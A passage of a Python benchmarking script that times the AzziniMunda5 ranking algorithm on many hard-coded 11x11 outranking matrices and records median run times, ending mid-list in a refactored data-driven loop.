[22,28,0,21,26,31,23,32,28,32,30],
[29,31,30,0,28,35,23,33,33,36,32],
[28,27,25,23,0,32,24,34,27,35,27],
[25,20,20,16,19,0,17,31,20,28,25],
[20,29,28,28,27,34,0,34,32,26,32],
[21,21,19,18,17,20,17,0,27,26,32],
[24,24,23,18,24,31,19,24,0,28,28],
[22,25,19,15,16,23,25,25,23,0,24],
[20,20,21,19,24,26,19,19,23,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 88, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,29,27,21,25,16,19,21,27,45],
[29,0,32,19,16,22,23,29,30,27,27],
[22,19,0,14,16,15,30,8,26,17,21],
[24,32,37,0,18,27,30,16,22,26,45],
[30,35,35,33,0,26,22,30,35,25,34],
[26,29,36,24,25,0,30,21,38,30,36],
[35,28,21,21,29,21,0,19,21,25,34],
[32,22,43,35,21,30,32,0,25,29,43],
[30,21,25,29,16,13,30,26,0,26,36],
[24,24,34,25,26,21,26,22,25,0,28],
[6,24,30,6,17,15,17,8,15,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 89, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,25,25,27,31,30,31,27,24,34],
[25,0,32,29,32,30,31,31,27,28,34],
[26,19,0,27,24,24,22,21,25,23,24],
[26,22,24,0,25,25,24,18,25,21,25],
[24,19,27,26,0,28,27,25,23,24,27],
[20,21,27,26,23,0,27,23,20,20,26],
[21,20,29,27,24,24,0,26,30,23,26],
[20,20,30,33,26,28,25,0,22,24,29],
[24,24,26,26,28,31,21,29,0,24,29],
[27,23,28,30,27,31,28,27,27,0,31],
[17,17,27,26,24,25,25,22,22,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 90, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,27,28,30,29,29,23,34,38,27],
[25,0,25,24,24,29,24,27,32,29,25],
[24,26,0,29,36,31,29,25,33,31,32],
[23,27,22,0,33,31,30,33,35,27,25],
[21,27,15,18,0,25,24,20,35,32,28],
[22,22,20,20,26,0,27,30,29,25,25],
[22,27,22,21,27,24,0,22,29,31,30],
[28,24,26,18,31,21,29,0,31,32,28],
[17,19,18,16,16,22,22,20,0,19,15],
[13,22,20,24,19,26,20,19,32,0,23],
[24,26,19,26,23,26,21,23,36,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 91, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,16,20,27,28,24,24,21,17,17],
[25,0,13,23,22,21,22,24,18,21,18],
[35,38,0,28,27,32,30,28,28,23,20],
[31,28,23,0,24,27,29,27,22,15,25],
[24,29,24,27,0,25,27,22,22,11,18],
[23,30,19,24,26,0,23,22,17,15,21],
[27,29,21,22,24,28,0,25,21,20,24],
[27,27,23,24,29,29,26,0,26,22,27],
[30,33,23,29,29,34,30,25,0,27,27],
[34,30,28,36,40,36,31,29,24,0,23],
[34,33,31,26,33,30,27,24,24,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 92, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,29,27,10,36,20,12,19,5,22],
[37,0,41,39,12,36,15,19,22,25,22],
[22,10,0,39,12,34,20,19,10,10,27],
[24,12,12,0,12,26,10,22,3,15,17],
[41,39,39,39,0,38,32,25,39,32,30],
[15,15,17,25,13,0,20,20,20,13,30],
[31,36,31,41,19,31,0,33,24,29,24],
[39,32,32,29,26,31,18,0,30,32,29],
[32,29,41,48,12,31,27,21,0,20,24],
[46,26,41,36,19,38,22,19,31,0,22],
[29,29,24,34,21,21,27,22,27,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 93, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,25,35,19,35,29,32,36,25,26],
[27,0,22,27,19,26,28,22,27,28,33],
[26,29,0,37,20,39,21,31,35,25,27],
[16,24,14,0,15,34,13,25,26,19,15],
[32,32,31,36,0,36,20,31,38,21,33],
[16,25,12,17,15,0,14,19,27,19,20],
[22,23,30,38,31,37,0,35,41,22,26],
[19,29,20,26,20,32,16,0,33,27,28],
[15,24,16,25,13,24,10,18,0,16,21],
[26,23,26,32,30,32,29,24,35,0,37],
[25,18,24,36,18,31,25,23,30,14,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 94, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,13,18,12,19,19,18,22,18,16,22],
[38,0,32,23,30,32,28,35,33,31,31],
[33,19,0,24,23,27,27,24,25,26,30],
[39,28,27,0,29,30,20,25,31,25,31],
[32,21,28,22,0,25,26,20,22,25,25],
[32,19,24,21,26,0,27,25,22,24,26],
[33,23,24,31,25,24,0,23,27,27,30],
[29,16,27,26,31,26,28,0,29,29,29],
[33,18,26,20,29,29,24,22,0,29,27],
[35,20,25,26,26,27,24,22,22,0,27],
[29,20,21,20,26,25,21,22,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 95, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,32,35,32,29,29,30,34,24,27],
[25,0,28,28,33,32,26,25,34,25,23],
[19,23,0,28,28,22,19,18,26,26,27],
[16,23,23,0,25,25,20,21,25,20,18],
[19,18,23,26,0,23,21,26,26,24,29],
[22,19,29,26,28,0,21,24,25,22,25],
[22,25,32,31,30,30,0,23,29,25,25],
[21,26,33,30,25,27,28,0,31,25,28],
[17,17,25,26,25,26,22,20,0,23,25],
[27,26,25,31,27,29,26,26,28,0,28],
[24,28,24,33,22,26,26,23,26,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 96, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,28,23,25,32,20,27,18,18,34],
[32,0,31,24,30,28,33,23,27,24,30],
[23,20,0,25,23,24,27,22,19,16,40],
[28,27,26,0,26,25,30,23,21,22,27],
[26,21,28,25,0,24,28,27,30,26,22],
[19,23,27,26,27,0,25,33,25,19,36],
[31,18,24,21,23,26,0,27,24,18,28],
[24,28,29,28,24,18,24,0,22,20,25],
[33,24,32,30,21,26,27,29,0,20,32],
[33,27,35,29,25,32,33,31,31,0,38],
[17,21,11,24,29,15,23,26,19,13,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 97, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,26,26,19,21,25,23,23,20,23,20],
[25,0,25,25,27,18,20,22,19,22,17],
[25,26,0,25,29,20,25,25,25,24,23],
[32,26,26,0,31,25,31,25,24,26,26],
[30,24,22,20,0,25,25,25,19,24,20],
[26,33,31,26,26,0,28,28,26,27,25],
[28,31,26,20,26,23,0,22,22,26,20],
[28,29,26,26,26,23,29,0,25,25,21],
[31,32,26,27,32,25,29,26,0,30,22],
[28,29,27,25,27,24,25,26,21,0,20],
[31,34,28,25,31,26,31,30,29,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 98, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,32,26,31,30,28,31,25,24,25,20],
[19,0,22,27,27,22,27,23,17,26,18],
[25,29,0,30,32,25,29,27,24,25,21],
[20,24,21,0,23,21,25,23,18,23,15],
[21,24,19,28,0,22,27,23,22,23,22],
[23,29,26,30,29,0,27,30,23,29,26],
[20,24,22,26,24,24,0,27,21,22,21],
[26,28,24,28,28,21,24,0,21,30,23],
[27,34,27,33,29,28,30,30,0,29,25],
[26,25,26,28,28,22,29,21,22,0,18],
[31,33,30,36,29,25,30,28,26,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 99, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,18,12,17,8,19,13,9,8,13],
[37,0,36,30,30,19,26,29,33,22,22],
[33,15,0,19,24,15,12,20,26,25,10],
[39,21,32,0,32,27,17,28,28,11,16],
[34,21,27,19,0,21,27,25,25,23,15],
[43,32,36,24,30,0,25,37,34,28,27],
[32,25,39,34,24,26,0,24,25,22,24],
[38,22,31,23,26,14,27,0,29,17,22],
[42,18,25,23,26,17,26,22,0,17,23],
[43,29,26,40,28,23,29,34,34,0,24],
[38,29,41,35,36,24,27,29,28,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 100, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,26,25,19,23,26,25,25,22,20],
[30,0,35,26,29,25,31,33,30,30,28],
[25,16,0,20,22,19,26,27,27,23,20],
[26,25,31,0,27,27,30,27,33,28,27],
[32,22,29,24,0,25,29,29,24,22,28],
[28,26,32,24,26,0,32,26,26,23,24],
[25,20,25,21,22,19,0,26,22,22,21],
[26,18,24,24,22,25,25,0,23,23,25],
[26,21,24,18,27,25,29,28,0,24,24],
[29,21,28,23,29,28,29,28,27,0,28],
[31,23,31,24,23,27,30,26,27,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 101, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,27,28,23,29,19,32,26,27,25],
[26,0,27,27,25,30,27,30,27,31,28],
[24,24,0,22,24,28,22,28,24,29,24],
[23,24,29,0,20,28,26,32,22,30,29],
[28,26,27,31,0,27,28,31,25,34,29],
[22,21,23,23,24,0,21,26,25,28,21],
[32,24,29,25,23,30,0,31,27,32,30],
[19,21,23,19,20,25,20,0,22,22,17],
[25,24,27,29,26,26,24,29,0,31,24],
[24,20,22,21,17,23,19,29,20,0,19],
[26,23,27,22,22,30,21,34,27,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 102, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,22,31,19,32,28,28,38,18,37],
[27,0,32,32,28,29,23,16,26,18,30],
[29,19,0,20,32,38,34,14,45,32,23],
[20,19,31,0,35,32,34,16,39,24,24],
[32,23,19,16,0,33,33,18,39,17,22],
[19,22,13,19,18,0,24,19,38,18,21],
[23,28,17,17,18,27,0,16,35,19,23],
[23,35,37,35,33,32,35,0,39,36,23],
[13,25,6,12,12,13,16,12,0,12,23],
[33,33,19,27,34,33,32,15,39,0,21],
[14,21,28,27,29,30,28,28,28,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 103, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
# ------------------------------------------------------------------
# Benchmark cases 104-141 (11x11 outranking matrices).
#
# Each matrix below was previously benchmarked by its own copy-pasted
# 14-line timing block; the identical blocks are collapsed into one
# data-driven loop.  Case ids are assigned sequentially via
# enumerate(start=104), so the printed lines and the rows stacked onto
# `results` are identical to the original script's output, and the
# module-level variables (`om`, `times`, `algorithm`, `sol`, `t`,
# `exec_time`, `result`, `i`) end with the same values as before.
# ------------------------------------------------------------------
_case_matrices = [
    np.array([  # case 104
        [0,24,3,12,28,14,16,20,23,24,12],
        [27,0,25,28,23,13,18,32,34,20,23],
        [48,26,0,25,25,32,26,32,38,30,14],
        [39,23,26,0,39,25,23,29,39,28,24],
        [23,28,26,12,0,20,23,26,24,23,22],
        [37,38,19,26,31,0,21,38,40,16,27],
        [35,33,25,28,28,30,0,29,45,34,27],
        [31,19,19,22,25,13,22,0,16,16,9],
        [28,17,13,12,27,11,6,35,0,17,14],
        [27,31,21,23,28,35,17,35,34,0,26],
        [39,28,37,27,29,24,24,42,37,25,0]]),
    np.array([  # case 105
        [0,29,26,29,28,21,25,21,23,28,23],
        [22,0,22,20,21,21,19,23,22,25,25],
        [25,29,0,27,27,20,26,18,21,32,23],
        [22,31,24,0,20,17,21,22,19,26,23],
        [23,30,24,31,0,21,24,22,24,36,29],
        [30,30,31,34,30,0,31,26,22,35,29],
        [26,32,25,30,27,20,0,25,29,29,29],
        [30,28,33,29,29,25,26,0,28,31,24],
        [28,29,30,32,27,29,22,23,0,34,26],
        [23,26,19,25,15,16,22,20,17,0,27],
        [28,26,28,28,22,22,22,27,25,24,0]]),
    np.array([  # case 106
        [0,23,29,30,28,29,21,34,29,17,26],
        [28,0,26,25,28,30,26,30,28,26,23],
        [22,25,0,25,28,24,20,32,31,20,26],
        [21,26,26,0,23,22,27,32,29,28,24],
        [23,23,23,28,0,27,20,32,27,24,26],
        [22,21,27,29,24,0,28,32,32,21,22],
        [30,25,31,24,31,23,0,33,33,25,28],
        [17,21,19,19,19,19,18,0,26,19,21],
        [22,23,20,22,24,19,18,25,0,17,25],
        [34,25,31,23,27,30,26,32,34,0,27],
        [25,28,25,27,25,29,23,30,26,24,0]]),
    np.array([  # case 107
        [0,31,27,22,29,31,29,24,24,21,20],
        [20,0,25,22,28,26,22,23,20,23,18],
        [24,26,0,23,33,28,25,27,23,22,24],
        [29,29,28,0,27,24,27,28,26,26,29],
        [22,23,18,24,0,23,21,22,22,18,14],
        [20,25,23,27,28,0,24,21,24,25,17],
        [22,29,26,24,30,27,0,25,25,24,24],
        [27,28,24,23,29,30,26,0,25,25,21],
        [27,31,28,25,29,27,26,26,0,24,26],
        [30,28,29,25,33,26,27,26,27,0,31],
        [31,33,27,22,37,34,27,30,25,20,0]]),
    np.array([  # case 108
        [0,28,25,23,31,25,27,30,20,29,20],
        [23,0,22,25,31,21,20,22,28,34,25],
        [26,29,0,21,23,21,30,27,21,29,20],
        [28,26,30,0,25,17,22,21,19,25,28],
        [20,20,28,26,0,14,21,28,24,23,19],
        [26,30,30,34,37,0,25,33,27,34,33],
        [24,31,21,29,30,26,0,30,30,28,29],
        [21,29,24,30,23,18,21,0,27,32,29],
        [31,23,30,32,27,24,21,24,0,22,26],
        [22,17,22,26,28,17,23,19,29,0,22],
        [31,26,31,23,32,18,22,22,25,29,0]]),
    np.array([  # case 109
        [0,27,27,21,23,22,20,26,21,25,21],
        [24,0,30,22,23,26,22,28,27,26,24],
        [24,21,0,22,18,24,16,23,25,26,24],
        [30,29,29,0,30,26,23,30,32,29,23],
        [28,28,33,21,0,26,25,37,30,27,27],
        [29,25,27,25,25,0,28,29,33,32,23],
        [31,29,35,28,26,23,0,30,28,28,24],
        [25,23,28,21,14,22,21,0,22,27,17],
        [30,24,26,19,21,18,23,29,0,27,22],
        [26,25,25,22,24,19,23,24,24,0,25],
        [30,27,27,28,24,28,27,34,29,26,0]]),
    np.array([  # case 110
        [0,15,23,21,24,13,31,26,21,32,16],
        [36,0,35,30,35,26,36,30,31,40,23],
        [28,16,0,31,30,16,31,24,29,37,28],
        [30,21,20,0,23,23,37,30,29,38,21],
        [27,16,21,28,0,13,26,23,22,30,18],
        [38,25,35,28,38,0,37,30,29,37,21],
        [20,15,20,14,25,14,0,20,18,32,11],
        [25,21,27,21,28,21,31,0,24,36,24],
        [30,20,22,22,29,22,33,27,0,36,22],
        [19,11,14,13,21,14,19,15,15,0,5],
        [35,28,23,30,33,30,40,27,29,46,0]]),
    np.array([  # case 111
        [0,25,33,31,24,26,30,28,28,29,26],
        [26,0,28,30,26,28,25,29,23,28,22],
        [18,23,0,24,21,25,23,23,21,24,22],
        [20,21,27,0,25,28,23,24,25,22,20],
        [27,25,30,26,0,29,26,25,24,27,23],
        [25,23,26,23,22,0,22,30,24,25,19],
        [21,26,28,28,25,29,0,30,27,29,26],
        [23,22,28,27,26,21,21,0,21,25,21],
        [23,28,30,26,27,27,24,30,0,26,25],
        [22,23,27,29,24,26,22,26,25,0,21],
        [25,29,29,31,28,32,25,30,26,30,0]]),
    np.array([  # case 112
        [0,28,32,25,33,22,23,42,27,37,34],
        [23,0,24,26,28,15,25,32,25,27,27],
        [19,27,0,17,24,13,20,34,21,27,27],
        [26,25,34,0,27,26,27,36,19,32,34],
        [18,23,27,24,0,14,20,30,19,26,31],
        [29,36,38,25,37,0,34,45,31,34,32],
        [28,26,31,24,31,17,0,41,24,36,37],
        [9,19,17,15,21,6,10,0,13,19,28],
        [24,26,30,32,32,20,27,38,0,41,40],
        [14,24,24,19,25,17,15,32,10,0,31],
        [17,24,24,17,20,19,14,23,11,20,0]]),
    np.array([  # case 113
        [0,25,26,23,31,36,35,33,36,33,36],
        [26,0,32,31,22,34,34,24,28,26,30],
        [25,19,0,25,21,35,37,29,21,25,37],
        [28,20,26,0,28,36,22,12,28,20,36],
        [20,29,30,23,0,24,26,22,24,32,24],
        [15,17,16,15,27,0,37,19,24,25,28],
        [16,17,14,29,25,14,0,12,20,16,26],
        [18,27,22,39,29,32,39,0,32,37,30],
        [15,23,30,23,27,27,31,19,0,27,28],
        [18,25,26,31,19,26,35,14,24,0,20],
        [15,21,14,15,27,23,25,21,23,31,0]]),
    np.array([  # case 114
        [0,27,21,30,22,22,31,25,26,26,34],
        [24,0,25,26,23,19,28,27,22,23,26],
        [30,26,0,25,26,22,28,21,25,27,29],
        [21,25,26,0,26,28,33,27,23,28,34],
        [29,28,25,25,0,24,28,20,26,29,30],
        [29,32,29,23,27,0,34,30,20,27,32],
        [20,23,23,18,23,17,0,24,20,25,23],
        [26,24,30,24,31,21,27,0,24,32,29],
        [25,29,26,28,25,31,31,27,0,26,31],
        [25,28,24,23,22,24,26,19,25,0,26],
        [17,25,22,17,21,19,28,22,20,25,0]]),
    np.array([  # case 115
        [0,29,23,27,20,24,22,25,22,26,28],
        [22,0,22,24,26,23,23,17,23,24,22],
        [28,29,0,29,27,27,28,28,24,30,33],
        [24,27,22,0,29,24,25,23,21,29,30],
        [31,25,24,22,0,23,19,24,25,24,24],
        [27,28,24,27,28,0,26,18,20,23,30],
        [29,28,23,26,32,25,0,22,31,28,32],
        [26,34,23,28,27,33,29,0,31,28,31],
        [29,28,27,30,26,31,20,20,0,25,32],
        [25,27,21,22,27,28,23,23,26,0,32],
        [23,29,18,21,27,21,19,20,19,19,0]]),
    np.array([  # case 116
        [0,28,16,27,23,27,17,25,23,26,29],
        [23,0,25,30,37,29,24,28,26,25,28],
        [35,26,0,27,26,28,26,23,25,32,25],
        [24,21,24,0,32,29,19,27,19,27,24],
        [28,14,25,19,0,22,9,24,18,19,22],
        [24,22,23,22,29,0,17,21,22,24,21],
        [34,27,25,32,42,34,0,29,28,37,32],
        [26,23,28,24,27,30,22,0,20,27,19],
        [28,25,26,32,33,29,23,31,0,27,23],
        [25,26,19,24,32,27,14,24,24,0,19],
        [22,23,26,27,29,30,19,32,28,32,0]]),
    np.array([  # case 117
        [0,26,21,19,21,21,29,28,26,24,22],
        [25,0,20,19,20,19,25,21,21,17,17],
        [30,31,0,27,22,21,29,32,30,26,24],
        [32,32,24,0,30,26,30,28,34,29,28],
        [30,31,29,21,0,23,29,24,25,29,27],
        [30,32,30,25,28,0,31,33,29,30,25],
        [22,26,22,21,22,20,0,26,26,27,25],
        [23,30,19,23,27,18,25,0,25,24,22],
        [25,30,21,17,26,22,25,26,0,25,26],
        [27,34,25,22,22,21,24,27,26,0,21],
        [29,34,27,23,24,26,26,29,25,30,0]]),
    np.array([  # case 118
        [0,18,30,18,26,25,7,21,16,47,12],
        [33,0,34,22,30,33,29,15,24,29,22],
        [21,17,0,16,30,27,17,32,27,41,26],
        [33,29,35,0,30,39,29,25,35,35,22],
        [25,21,21,21,0,25,21,16,21,21,22],
        [26,18,24,12,26,0,21,21,42,47,12],
        [44,22,34,22,30,30,0,25,39,51,21],
        [30,36,19,26,35,30,26,0,42,42,31],
        [35,27,24,16,30,9,12,9,0,31,12],
        [4,22,10,16,30,4,0,9,20,0,16],
        [39,29,25,29,29,39,30,20,39,35,0]]),
    np.array([  # case 119
        [0,13,38,47,21,29,41,38,41,41,46],
        [38,0,42,47,39,21,45,43,34,46,50],
        [13,9,0,47,1,25,25,31,42,30,41],
        [4,4,4,0,4,20,12,26,20,12,37],
        [30,12,50,47,0,33,45,34,46,29,45],
        [22,30,26,31,18,0,29,27,42,30,45],
        [10,6,26,39,6,22,0,27,34,22,38],
        [13,8,20,25,17,24,24,0,25,13,41],
        [10,17,9,31,5,9,17,26,0,17,50],
        [10,5,21,39,22,21,29,38,34,0,38],
        [5,1,10,14,6,6,13,10,1,13,0]]),
    np.array([  # case 120
        [0,24,19,22,24,25,26,25,23,25,30],
        [27,0,20,21,17,25,23,21,21,26,21],
        [32,31,0,26,28,26,29,23,26,28,29],
        [29,30,25,0,24,27,30,25,25,26,30],
        [27,34,23,27,0,25,23,23,21,29,29],
        [26,26,25,24,26,0,24,22,20,27,31],
        [25,28,22,21,28,27,0,28,25,26,27],
        [26,30,28,26,28,29,23,0,24,27,30],
        [28,30,25,26,30,31,26,27,0,26,28],
        [26,25,23,25,22,24,25,24,25,0,23],
        [21,30,22,21,22,20,24,21,23,28,0]]),
    np.array([  # case 121
        [0,31,25,38,28,37,27,31,34,40,30],
        [20,0,28,29,25,17,24,22,25,31,30],
        [26,23,0,27,17,25,20,26,17,30,28],
        [13,22,24,0,14,19,22,30,31,32,24],
        [23,26,34,37,0,26,24,30,36,31,22],
        [14,34,26,32,25,0,27,18,28,33,25],
        [24,27,31,29,27,24,0,28,23,34,33],
        [20,29,25,21,21,33,23,0,23,29,21],
        [17,26,34,20,15,23,28,28,0,27,32],
        [11,20,21,19,20,18,17,22,24,0,32],
        [21,21,23,27,29,26,18,30,19,19,0]]),
    np.array([  # case 122
        [0,24,18,8,8,12,16,17,10,8,26],
        [27,0,21,18,18,28,18,14,25,19,28],
        [33,30,0,19,21,23,21,25,22,21,34],
        [43,33,32,0,19,25,25,24,16,27,30],
        [43,33,30,32,0,31,21,28,22,32,27],
        [39,23,28,26,20,0,22,27,26,14,29],
        [35,33,30,26,30,29,0,24,27,26,27],
        [34,37,26,27,23,24,27,0,22,23,32],
        [41,26,29,35,29,25,24,29,0,18,36],
        [43,32,30,24,19,37,25,28,33,0,33],
        [25,23,17,21,24,22,24,19,15,18,0]]),
    np.array([  # case 123
        [0,36,24,20,29,23,32,33,8,27,22],
        [15,0,22,14,29,19,12,29,17,19,19],
        [27,29,0,13,24,37,29,29,22,32,26],
        [31,37,38,0,30,29,30,29,38,37,19],
        [22,22,27,21,0,32,24,29,22,32,27],
        [28,32,14,22,19,0,25,20,22,26,27],
        [19,39,22,21,27,26,0,27,22,30,27],
        [18,22,22,22,22,31,24,0,17,16,17],
        [43,34,29,13,29,29,29,34,0,37,31],
        [24,32,19,14,19,25,21,35,14,0,19],
        [29,32,25,32,24,24,24,34,20,32,0]]),
    np.array([  # case 124
        [0,27,23,35,25,30,39,32,26,25,28],
        [24,0,29,37,30,36,37,25,28,30,33],
        [28,22,0,34,32,32,34,36,33,33,33],
        [16,14,17,0,17,19,30,20,23,24,19],
        [26,21,19,34,0,28,32,25,26,24,26],
        [21,15,19,32,23,0,29,23,27,25,25],
        [12,14,17,21,19,22,0,21,26,18,17],
        [19,26,15,31,26,28,30,0,28,21,24],
        [25,23,18,28,25,24,25,23,0,25,27],
        [26,21,18,27,27,26,33,30,26,0,27],
        [23,18,18,32,25,26,34,27,24,24,0]]),
    np.array([  # case 125
        [0,19,22,32,27,18,21,26,35,32,32],
        [32,0,27,40,26,20,27,29,32,29,31],
        [29,24,0,38,26,29,25,28,35,27,33],
        [19,11,13,0,26,14,18,16,27,25,17],
        [24,25,25,25,0,16,23,25,29,30,22],
        [33,31,22,37,35,0,29,32,29,33,27],
        [30,24,26,33,28,22,0,25,35,28,31],
        [25,22,23,35,26,19,26,0,26,31,23],
        [16,19,16,24,22,22,16,25,0,23,19],
        [19,22,24,26,21,18,23,20,28,0,22],
        [19,20,18,34,29,24,20,28,32,29,0]]),
    np.array([  # case 126
        [0,23,23,27,29,25,26,21,21,30,26],
        [28,0,28,29,30,25,31,25,29,34,28],
        [28,23,0,26,27,23,26,20,21,30,22],
        [24,22,25,0,29,28,23,26,27,26,25],
        [22,21,24,22,0,27,31,24,24,28,24],
        [26,26,28,23,24,0,30,30,23,32,29],
        [25,20,25,28,20,21,0,24,26,28,23],
        [30,26,31,25,27,21,27,0,23,28,24],
        [30,22,30,24,27,28,25,28,0,27,30],
        [21,17,21,25,23,19,23,23,24,0,22],
        [25,23,29,26,27,22,28,27,21,29,0]]),
    np.array([  # case 127
        [0,23,27,24,27,31,30,28,27,30,28],
        [28,0,24,27,28,35,34,31,26,31,30],
        [24,27,0,23,27,28,29,30,26,31,23],
        [27,24,28,0,26,29,40,33,28,31,31],
        [24,23,24,25,0,28,31,27,24,28,24],
        [20,16,23,22,23,0,29,26,21,28,25],
        [21,17,22,11,20,22,0,23,21,26,22],
        [23,20,21,18,24,25,28,0,21,26,24],
        [24,25,25,23,27,30,30,30,0,30,31],
        [21,20,20,20,23,23,25,25,21,0,22],
        [23,21,28,20,27,26,29,27,20,29,0]]),
    np.array([  # case 128
        [0,32,27,27,27,31,27,20,29,23,21],
        [19,0,14,18,21,22,16,16,19,14,24],
        [24,37,0,22,27,32,31,27,29,32,16],
        [24,33,29,0,26,29,27,29,28,33,29],
        [24,30,24,25,0,26,23,20,24,23,25],
        [20,29,19,22,25,0,25,13,17,16,21],
